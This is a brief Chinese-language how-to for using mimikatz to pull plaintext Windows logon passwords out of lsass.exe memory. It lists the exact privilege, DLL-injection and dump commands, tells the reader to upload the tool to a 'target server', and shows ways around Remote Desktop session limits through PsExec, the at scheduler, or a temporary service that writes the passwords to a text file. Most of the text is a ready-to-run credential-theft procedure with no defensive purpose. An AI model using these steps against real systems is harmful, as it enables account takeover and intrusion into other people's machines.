mimikatz是法國人寫的,windows下的輕量級調試器。可以直接抓取windows的口令。只要沒有重啟,登入過的賬戶口令都可以抓到。牛。
抓取 lsass.exe 中的使用者純文字密碼:
//提升許可權 privilege::debug
//注入dll inject::process lsass.exe sekurlsa.dll
//抓取密碼 @getLogonPasswords
在遠程終端(3389、mstsc.exe)、虛擬桌面中抓取密碼的方法:
通常你在遠程終端中運行該程式會提示:儲存空間不足,無法處理此命令。
這是因為在終端模式下,不能插入遠線程,跨會話不能注入,你需要使用如下方法執行該程式:
首先提取幾個檔案,只抓取密碼的話,只需要這幾個檔案:
mimikatz_trunk\tools\PsExec.exe
mimikatz_trunk\Win32\mimikatz.exe
mimikatz_trunk\Win32\sekurlsa.dll
打包後上傳至目標伺服器,然後解壓釋放,注意路徑中絕對不能有中文(可以有空格)!否則載入DLL的時候會報錯:找不到檔案。
然後使用以下任何一種方法即可抓取密碼:
//最簡單實用的方法,使用 PsExec.exe 啟動。
//在本機啟動互動式命令提示視窗 psexec\\127.0.0.1 cmd.exe
//啟動 mimikatz.exe C:\mimikatz_trunk\Win32\mimikatz.exe
//提升許可權 privilege::debug //注入dll,要用絕對路徑!並且路徑中絕對不能有中文(可以有空格)! inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"
//抓取密碼 @getLogonPasswords //退出,不要用 ctrl + c,會導致 mimikatz.exe CPU 佔用達到 100%,死迴圈。 exit
//*********************************************************
//使用 At 啟動 at *** //*********************************************************
//建立服務方法 sc create getpassword binpath= "cmd.exe /c c:\xxx\mimikatz.exe < command.txt > password.txt" sc start getpassword sc delete getpassword //*********************************************************
//telnet 遠程命令管道 telnet ****